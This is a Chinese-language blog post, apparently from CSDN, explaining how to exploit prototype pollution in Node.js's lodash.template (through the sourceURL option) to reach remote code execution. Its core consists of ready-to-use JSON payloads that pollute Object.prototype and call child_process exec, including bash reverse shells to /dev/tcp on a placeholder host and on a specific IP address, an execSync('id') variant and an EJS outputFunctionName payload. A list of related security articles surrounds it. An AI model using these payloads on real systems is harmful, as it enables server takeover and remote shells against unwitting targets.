[WEB/Nodejs]原型链污染中lodash的利用方法分析

最新推荐文章于 2024-08-12 14:59:23 发布
最新推荐文章于 2024-08-12 14:59:23 发布
阅读量629 收藏
点赞数
分类专栏: # Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/124000502
版权

web nodejs
lodash.template

显式的lodashs.merge存在原型链污染漏洞,为了对其进行利用,需要找到可以对原型进行修改的逻辑。

optionssourceURL

options是一个对象,sourceURL是通过下面的语句赋值的,options默认没有sourceURL属性,所以sourceURL默认也是为空。

var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';

给options的原型对象加一个sourceURL属性,那么我们就可以控制sourceURL的值。

Function

相关了解Function构造器(构造函数)

文档:构造函数EJS原型污染RCE分析

JS当中每个函数都是一个Fuction对象, (function(){}).constructor === Function

var person = { age:3 }
var myFunction = new Function("a", "return 1*a*this.age");
myFunction.apply(person,[2])
// return 1*a*this.age 即为functionBody,可以执行我们的代码。

sourceURL传递到了Function函数的第二个参数当中,此处可以

var result = attempt(function() {
    return Function(importsKeys, sourceURL + 'return ' + source)
      .apply(undefined, importsValues);
  });

通过构造chile_process.exec()就可以执行任意代码了

Payload

{"__proto__":
	{
        "query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"')"
    }
}
// bash -c “cmd string” 执行一个命令·		
// 以上PAYLOAD将输出输入反弹到指定的主机端口

以上Payload会产生一个报错,可以使用以下Payload来排除,

{"__proto__":{"sourceURL":"\nreturn e=> {for (var a in {}) {delete Object.prototype[a];} return global.process.mainModule.constructor._load('child_process').execSync('id')}\n//"}}

当然除了常见命令以外,还能构造反弹Shell,因为并不是所有的原型链污染都存在明确的回显,

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/121.36.96.230/2333 0>&1\"');var __tmp2"}}
車鈊
关注
专栏目录
Nodejs博客项目开发】准备工作
马云
09-29 2209
Nodejs博客项目开发准备工作 一、开发之前的准备 Nodejs的真正用途: 是一个JavaScript运行环境;运行在服务器,作为web server;运行在本地,作为打包、构建工具 Nodejs的学习困惑: Nodejs运行在服务端,而非浏览器环境,服务端开发的思路和套路,与前端不一样 1、知识点介绍 2、案例架构图 3、下载nodejs 方法一:nodejs官网 方法二:使用nvm nvm , nodejs 版本管理工具,可切换多个nodejs版本 mac os ,使用brew in
NSSCTF 2nd WEB
ytl_storm的博客
09-25 350
当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录创建一个名为.的文件,最后上传的结果就为test.php。这里绕过的主要原理是Tornado模板在渲染时会执行__tt_utf8(__tt_tmp) 这样的函数,所以将__tt_utf8设置为eval,然后将__tt_tmp设置为了从POST方法接收的字符串导致了RCE。为具体的某个算法,则密钥是不能为空的。猜测这里存在SSRF漏洞。
用前端原型链漏洞污染拿下了服务器
程序员成长指北
07-12 491
大厂技术高级前端Node进阶点击上方程序员成长指北,关注公众号回复1,加入高级Node交流群作为前端开发者,某天偶然遇到了原型链污染漏洞,原本以为没有什么影响,好奇心驱使下,抽丝剥茧,发现原型链污染漏洞竟然也可以拿下服务器的shell管理权限,不可不留意!某天正奋力的coding,机器人给发了这样一条消息查看发现是一个叫“原型链污染”(Prototype cha...
jQuery和lodash导致原型污染的安全问题
Mybells
04-09 1131
jQuery jquery3.4.0(3.4.0及以后版本已修复)之前版本extend函数会导致原型污染。 let a = $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}')) console.log({}.devMode); // jquery3.4.0版本前会输出true 解决方法:在遍历对象时,当遇见 __p...
前端安全——最新:lodash原型漏洞从发现到修复全过程
最新发布
baimao__Ch的博客
08-12 464
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全文版)③项目源码(四五十个有趣且经典的练手项目及源码)
渗透攻击漏洞——原型链污染
qq_44640313的博客
10-24 985
简单认识原型链污染
JavaScript原型链污染攻击
BerL1n
07-18 7248
在理解攻击方法之前先了解一下js的面向对象编程的特点。 由于js非常面向对象的编程特性,js有很多神奇的操作。 在js你可以用各种方式操作自己的对象。 0x01 prototype和__proto__分别是什么? JavaScript,我们如果要定义一个类,需要以定义“构造函数”的方式来定义: function Foo() { this.bar = 1 } new Foo() ...
高性能的JavaScript库---Lodash
weixin_34356138的博客
05-13 270
上周在仿做Nodejs社区的时候,遇到了lodash这个javascript库,很惭愧,那也是我第一次听说lodash。人嘛,对于新鲜的事物总是会或多或少感到些好奇的,于是就毫不犹豫地去lodash官网逛了逛......咦...这货我怎么感觉在哪儿见过?......额,尼玛这不就是underscore吗?难道是升级版?于是接着各种百度,google......先在这里简单总结一下吧! ...
web前端面试题(必背面试题)
热门推荐
Z_Gleng的博客
05-25 3万+
自己总结的常见的面试题 总字数13万+ 大概有200+左右道题 会不定期更新
nodejs开发个人博客】- 0 概述
充电五分钟...
04-20 590
本笔记是关于慕课网nodejs开发个人博客》的课程笔记,包括API,数据存储,登录,日志,安全等模块; 技术部分包括:http、stream、session、mysql、redis、nginx、pm2等; 只是nodejs后台部分,不含前端部分; 案例架构图如下: 文章目录1、nodejs的用途:2、nodejs的下载和安装 1、nodejs的用途: Nodejs – 一个jav...
2017年Web前端技术综述
李子无为的杂货铺
01-26 1万+
Web前端应用发展的历史大概经历了三个阶段:第一个阶段使用的是简单的静态页面,第二个阶段使用得是ASP、JSP、PHP等动态脚本语言,第三个阶段是Web2.0阶段,其核心技术是AJAX,同时伴随着SPA的兴起。SPA vs. MPA从字面上理解,SPA(单页面应用程序)整个应用只有一个页面,只加载一次Web静态资源,包括HTML+CSS+javascript,在导航过程不需要重新加载渲染整个页面...
最新:Lodash 严重安全漏洞背后你不得不知道的 JavaScript 知识
bdfcfff77fa的博客
01-23 1566
通过分析 lodash 的漏洞,以及解决方案,我们了解了原型污染的方方面面。Object 原型原型、原型链NodeJS 相关问题Object.create 方法Object.freeze 方法Map 数据结构深拷贝以及其他问题这么来看,全是基础知识。也正是基础,构成了前端知识体系的方方面面。
node.js之lodash介绍
code_better的博客
07-18 8950
lodash是一个具有一致接口、模块化、高性能等特性的javascript工具库,是underscore.js的fork,其最初目标也是“一致的跨浏览器行为。。。,并改善性能”。 lodash采用延迟计算,意味着我们的链式方法在显式或者隐式的value()调用之前是不会执行的,因此lodash可以进行shortcut(捷径) fusion(融合)这样的优化,通过合并链式大大降低迭代的次数,从而大
nodejs-5.3 lodash小功能集合模块
weixin_34228662的博客
05-28 122
1.lodash学习网 2.lodash小栗子 转载于:https://www.cnblogs.com/xzsz/p/9098957.html
NodeJS使用lodash去重排序以及比较对象数组
u013071014的博客
06-30 3559
NodeJS使用lodash去重排序 在NodeJS可以使用lodash对对象数据进行去重并且排序。 let option = [ { "id": 1, "name": "aaa" }, { "id": 1, "name": "aaa" }, { "id": 3, "name": "ccc" }, { "id": 3, "n
【5天打卡】学习Lodash的第四天——安全漏洞学习
happy921212的博客
04-27 1605
避免原型污染有以下几种方法,JQuery的安全漏洞了解,Lodash的安全漏洞等……
nodejs通过lodash合并去重由unixtime和Date组成的两个数组
天地会珠海分舵
04-28 7289
1. 问题起源 最近在实现一个API,其有一部分功能是需要从Mongodb取出一个由Date对象组成的数组,然后将客户端传过来的unixtime合并到该数组,并且去重复。 比如,假设从mongodb取回来的数据有一个叫做gaming的项,专门用来记录用户进入游戏的开始时间和退出时间。 那么mongoose的schema的定义将大概是这样的: const DeviceLogS
NodeJS使用lodash去重排序
写代码的姜总的博客
08-11 263
nodejs原型链污染
09-12
在Node.js原型链污染是一种安全漏洞,它利用了JavaScript原型继承的特性。通过修改原型链,攻击者可以在目标对象上注入恶意属性或方法。 在提供的引用内容,通过调用`utils.copy(user, req.body)`函数,攻击者可以实现原型链污染。在`copy`函数,遍历`object2`的属性,并将其逐一赋值给`object1`。如果`object1`和`object2`都存在相同的属性,那么就会调用递归函数`copy`来复制这个属性的值。这个过程,如果`object2`的属性也是一个对象,并且在`object1`也存在相同的属性,那么递归调用`copy`函数会继续在这个属性上进行操作。 通过构造特定的恶意输入,攻击者可以将`Object.prototype`的属性或方法注入到 `req.body` 对象。在提供的代码示例,攻击者可以设置 `req.body` 的属性 `secert` 为一个对象,从而使其继承自 `Object.prototype`。这样,`req.body` 对象就获得了 `Object.prototype` 的所有属性和方法,包括 `toString`、`hasOwnProperty`等。进一步,当代码判断 `secert.ctfshow` 等于 `'36dboy'` 时,就会返回`flag`,使得攻击者可以绕过登录验证获取到敏感信息。 因此,通过利用原型链污染,攻击者可以在Node.js应用实现恶意操作,并绕过原本的安全检查。为了防止原型链污染的攻击,开发者应该对输入进行严格的验证和过滤,确保不会接受恶意的输入,并且避免直接使用`Object.prototype`的属性和方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值